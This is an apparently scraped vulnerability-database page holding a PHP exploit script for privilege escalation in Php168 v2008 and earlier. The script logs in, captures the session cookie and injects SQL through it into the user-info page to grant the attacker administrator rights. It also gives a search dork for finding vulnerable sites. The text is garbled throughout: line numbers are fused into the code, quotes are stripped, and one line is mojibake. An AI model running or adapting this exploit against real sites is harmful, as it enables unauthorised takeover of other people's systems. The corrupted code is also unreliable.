Php168 v2008 权限提升漏洞

测试方法:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.<?php2.print_r('3.+---------------------------------------------------------------------------+4.Php168 <= v2008 update user access exploit5.by puret_t6.mail: puretot at gmail dot com7.team: http://www.wolvez.org8.dork: "Powered by PHP168"9.+---------------------------------------------------------------------------+10.');11./**12.* works regardless of php.ini settings13.*/14.if ($argc < 5) {15.print_r('16.+---------------------------------------------------------------------------+17.Usage: php '.$argv[0]. host path user pass18.host:      target server (ip/hostname)19.path:      path to php16820.user:      login username21.pass:      login password22.Example:23.php .$argv[0]. localhost /php168/24.++25.);26.exit;27.}28. 29.error_reporting(7);30.ini_set(max_execution_time, 0);31. 32.$host = $argv[1];33.$path = $argv[2];34.$user = $argv[3];35.$pass = $argv[4];36. 37.$resp = send();38.preg_match(/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/, $resp, $cookie);39. 40.if ($cookie)41.if (strpos(send(), puret_t) !== false)42.exit(Expoilt Success!\nYou Are Admin Now!\n);43.else44.exit(Exploit Failed!\n);45.else46.exit(Exploit Failed!\n);47. 48.function rands($length = 8)49.{50.$hash = ;51.$chars = ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz;52.$max = strlen($chars) - 1;53.mt_srand((double)microtime() * 1000000);54.for ($i = 0; $i < $length; $i++)55.$hash .= $chars[mt_rand(0, $max)];56. 57.return $hash;58.}59. 60.function send()61.{62.global $host, $path, $user, $pass, $cookie;63. 64.if ($cookie) {65.$cookie[1] .= ;USR=.rands().\t%2b31,groupid=3,introduce=070757265745f74 WHERE uid=$cookie[2]#\t\t;66.$cmd = ;67. 
68.$message = POST .$path.member/userinfo.php  HTTP/1.1\r\n;69.$message .= Accept: */*\r\n;70.$message .= Accept-Language: zh-cn\r\n;71.$message .= Content-Type: application/x-www-form-urlencoded\r\n;72.$message .= User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n;73.$message .= CLIENT-IP: ryat\\\r\n;74.$message .= Host: $host\r\n;75.$message .= Content-Length: .strlen($cmd).\r\n;76.$message .= Connection: Close\r\n;77.$message .= Cookie: .$cookie[1].\r\n\r\n;78.$message .= $cmd;79.} else {80.$cmd = username=$user&password=$pass&step=2;81. 82.$message = POST .$path.login.php  HTTP/1.1\r\n;83.$message .= Accept: */*\r\n;84.$message .= Accept-Language: zh-cn\r\n;85.$message .= Content-Type: application/x-www-form-urlencoded\r\n;86.$message .= User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n;87.$message .= Host: $host\r\n;88.$message .= Content-Length: .strlen($cmd).\r\n;89.$message .= Connection: Close\r\n\r\n;90.$message .= $cmd;91.}92. 93.$fp = fsockopen($host, 80);94.fputs($fp, $message);95. 96.$resp = ;97. 98.while ($fp && !feof($fp))99.$resp .= fread($fp, 1024);100. 101.return $resp;102.}103. 104.?>